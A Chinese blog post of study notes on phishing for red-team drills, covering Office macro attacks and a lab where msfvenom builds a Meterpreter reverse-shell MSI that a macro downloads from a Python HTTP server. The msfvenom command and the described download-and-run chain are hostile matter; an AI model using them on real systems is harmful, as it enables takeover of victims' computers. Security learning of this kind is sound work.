首页 > 其他分享 >社工钓鱼

社工钓鱼

时间:2023-11-30 23:56:30浏览次数:41  
标签:office 钓鱼 kali msi msf 社工

前言

渗透实验学习了社工钓鱼样本的使用,跟着指导书简单的学习,这里写一下社工钓鱼的学习笔记,但是没有过实操的经验,所以是理论性的学习。
ps:未涉及免杀学习

概述

钓鱼常用在攻防演练对抗上,钓鱼的方式有很多,比如钓鱼网站、钓鱼邮件、钓鱼wifi、u盘钓鱼等等。


这里练习一些钓鱼方法

钓鱼文件

office宏文件钓鱼攻击

关于宏病毒

office宏病毒一般寄存于office文档,宏是,当用户打开文档,内置的宏命令就会执行,在计算机中执行恶意命令,恶意命令会自动访问提前部署好的恶意服务器下载木马程序到本地并运行,从而控制计算机。

本地测试

  • msf excel2003
    实验前需要在信任中心启用宏

要使用宏,需要学习一些office VBA语法,当然也可以直接使用msf或其他生成代码直接插入。

Alt text

msf生成msi文件

实验准备
  • 主机:

    • kali:192.168.163.128
    • windows:192.168.163.1
  • 网络环境:kali和物理机在同一局域网内,可以连通,配置kali为VMnet1仅主机模式
    具体操作可看这个https://blog.csdn.net/richardfjf/article/details/106728258

  1. 生成恶意msi文件
    msfvenom -p windows/x64/meterpreter/reverse_tcp lhsot=kali的ip lport=监听的端口 -f msi -o hack.msi

  2. msf建立监听
    Alt text

  3. pyhton开启http服务
    Alt text

    这个网络还是没配置好,主机访问不到http服务器
    Alt text

  4. 然后执行文件,自动运行宏,从服务器中下载恶意msi文件,成功上线。

标签:office,钓鱼,kali,msi,msf,社工
From: https://www.cnblogs.com/Crayon-Blog/p/17868725.html

相关文章

  • 安全防护之钓鱼邮件演练
    针对客户职工提供一站式的垂钓邮件演练服务、安全意识训练和考试服务,意图是评价职工面临攻击时所作出的反响,以便了解他们对此类网络保安办法的了解程度。 产品优势:1、灵活多元的交付模式:一站式垂钓邮件演练SaaS服务,包括渠道、电邮模块、邮件设件、专业人员服务等,提供SAAS服务......
  • 钓鱼网站
    【Kali制作一个钓鱼网站-CSDNApp】http://t.csdnimg.cn/DqAPm补充:实验结果:【搬运】i春秋SET:社会工程师的工具包-社会工程学-BT5工具集-黑客/渗透测试/网络安全/信息安全/漏洞_哔哩哔哩_bilibili......
  • 钓鱼识别视频AI算法,让智慧水务更上一层楼
    智慧水务已经成为现代水务行业的发展趋势,通过一系列的技术升级,实现智能化、高效化的水资源管理。其中,钓鱼识别视频AI算法的应用,更是为安全防线提供了强大的技术支持。本文将围绕智慧水务技术升级和钓鱼识别视频AI算法展开讨论,帮助读者了解这一技术在安全防线中的重要作用。一、智慧......
  • 邮件诈骗钓鱼 - 密码到期通知 案例
    诈骗发送方:Microsoftaccountteam<[email protected]>##############您的密码将于今天到期如果您想继续使用当前密码,请确认。继续使用当前密码【跳转诈骗钓鱼网页,请勿点击!!】注:为避免登陆中断,您必须立即采取行动。【恐吓用户点击更改密码】###......
  • 通过社工进网站后台
    通过社工进网站后台记录一次通过简单社工获取信息后进入后台的经过。打开思路,利用我们所有能够捕获的信息并串联起来。0X0开始:打开网站发现是一个登录网站随便输入账号密码,发现有用户名枚举:0X1获取icp备案企业:通过爆破用户名,然后爆破密码始终没有进去,于是开始了社工利......
  • 钓鱼文件应急溯源:方法篇
    内容概览背景恶意软件分析技术的市场如今,恶意软件分析已是信息安全领域的一个整体产业:发布保护产品的反病毒引擎实验室,高度专业化的专家小组,甚至恶意软件编写者本身也参与其中,他们争夺一个潜在的客户--"受害者"。常见的分析技术静态恶意软件分析静态恶意软件分析在不主......
  • 2023国家网络安全宣传周|邮件安全意识培训-钓鱼篇
    干货满满建议收藏反复阅读钓鱼邮件钓鱼邮件是指黑客伪装成同事、合作伙伴、朋友、家人等用户信任的人,通过发送电子邮件的方式,诱使用户回复邮件、点击嵌入邮件正文的恶意链接或者打开邮件附件以植入木马或间谍程序,进而窃取用户敏感数据、个人银行账户和密码等信息,或者在设备上执......
  • 个人如何预防钓鱼邮件
    个人PC预防钓鱼邮件的措施如下: 培养安全意识:了解钓鱼邮件的特征和常见手法,学习如何识别和应对钓鱼邮件。可以通过参加网络安全培训、阅读相关文章和参考安全机构的建议来提高自己的安全意识。 警惕邮件发送者:仔细检查邮件的发送者,特别是陌生的或不熟悉的发送者。注意检查发送......
  • 一例钓鱼网站解析
    今天早上一起床,打开空间,就看到了两条短链接使用短网址还原,得到两条短链接的真实网址当电脑打开这两个网址的时候,都会跳转到www.qq.com(腾讯网首页)模拟手机来访问这两个网址,出现“腾讯10周年活动”出现一张图片,可以看出这个页面编写人员在写代码的时候不是太严谨,body应加一条margin="......
  • Coremail AI实验室:利用高级语境和视觉智能进行钓鱼邮件检测
    在这个日益数字化的时代,对电子邮件安全需求是至关重要的。新兴的高级威胁邮件:应用社工技术的钓鱼邮件,仿冒公检法的钓鱼邮件等等,都需要更高级的防御策略。Coremail邮件安全人工智能实验室,整合了高级文本语境理解和智能图像处理能力,得以显著增强钓鱼邮件的检测能力,为千万级各行业终端......